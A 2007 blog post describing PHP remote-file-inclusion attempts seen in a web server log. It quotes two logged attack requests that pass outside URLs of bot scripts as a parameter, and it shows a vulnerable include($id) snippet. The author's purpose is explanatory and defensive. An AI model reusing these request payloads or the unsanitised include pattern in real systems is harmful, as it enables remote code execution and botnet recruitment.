Sat, 06 Oct 2007

php include hack?

I happened to be watching a log file when I was testing something and happened to notice the following type of request go by:

217.11.225.208 - - [05/Oct/2007:12:46:32 -0400] "GET /pictures/index.php?id=830/index.php?id=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 200 1435 "-" "libwww-perl/5.805"

85.11.62.235 - - [06/Oct/2007:01:03:47 -0400] "GET /pictures/index.php?id=http://ninaru.hut2.ru/images/cs.txt? HTTP/1.1" 200 1455 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"


Which was interesting, as it's obviously some type of hack attempt. I decided to look into it and it seems that it's a scripted attempt to just pass the url to any scripts that accept a variable, in hopes that someone was silly enough to accept that variable as an include and happened to have remote includes turned on in there php config, something like this:

< ?php

include($id);
// rest of script
?>


Then when the page is called, the url is passed in as the include and the script gets executed. Which seems to be some type of irc bot, although the file is all encoded to help try and hide what exactly is going on, although I'm sure you end up in some bot net ultimately. And from what I read it's not uncommon for people to actually have a page setup like that for redirects or some such nonsense. Obviously not a good practice as you'd likely end up victim to this request.

Here are a copy of the scripts hosted locally from the above to examples, as I doubt they'll be around forever on those hosts. cs.txt & cmd.txt

posted at: 02:45 | path: /security | permanent link to this entry


2019-Sep
2019-Jul
2019-Jun
2019-May
2018-Dec
2018-Jan
2017-Aug
2017-Jun
2017-May
2016-Nov
2015-Dec
2015-Nov
2015-Oct
2015-Jul
2015-Jun
2014-Dec
2012-Oct
2012-Sep
2012-Jun
2012-Feb
2012-Jan
2011-Dec
2011-Sep
2011-Aug
2011-May
2011-Feb
2010-Jun
2010-Apr
2010-Jan
2009-Sep
2009-Jul
2009-May
2009-Jan
2008-Oct
2008-Sep
2008-Jun
2008-May
2008-Jan
2007-Nov
2007-Oct
2007-Aug
2007-Jun
2007-May
2007-Mar
2007-Feb
2007-Jan
2006-Nov
2006-Oct
2006-Sep
2006-Aug
2006-Jun
2006-Apr
2006-Jan
2005-Dec
2005-Nov
2005-Oct
2005-Sep
2005-Aug
2005-Jul
2005-Jun
2005-May
2005-Apr
2005-Mar
2005-Feb
2005-Jan
2004-Dec
2004-Nov
2004-Oct
2004-Sep
2004-Aug
2004-Jul
2004-Jun
2004-May

Powered by PyBlosxom | RSS 2.0